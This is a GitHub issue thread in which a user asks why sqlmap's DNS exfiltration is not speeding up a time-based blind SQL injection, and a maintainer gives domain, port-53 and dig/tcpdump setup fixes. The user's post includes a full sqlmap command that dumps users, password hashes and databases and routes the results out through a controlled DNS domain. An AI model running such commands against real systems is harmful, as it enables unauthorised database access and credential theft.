### ISSUE TITLE
DNS exfiltration attack

### ISSUE THREAD

**Issue by BlackLz** [sqlmapproject/sqlmap#1749]
Hello, today I was trying to speed up a time-based blind with DNS exfiltration but I think that I'm missing something.
On Godaddy I pointed a subdomain to my ip them run sqlmap with this arguments.

**sqlmap -r blue.txt --level=5 --risk=3 --random-agent --keep-alive -v 3 --dbms=mysql --technique=T --skip -o --banner --users --passwords --count --fingerprint --dbs --dns-domain=www.sub.domain.com**

It supposed to speed things up but its is the samething... Am i missing something? 
I'm also using netcat to listen on port 53 but, no result.

**Comment by stamparm** [comment]
1) `--dns-domain=www.sub.domain.com` should be `--dns-domain=domain.com`
2) make sure that nothing else is listening on *:53 (e.g. dnsmasq)
3) if you are not able to catch anything with `dig foobar.domain.com` run on one machine and `sudo tcpdump -i any port 53` on the another then something is wrong with the whole NS setup
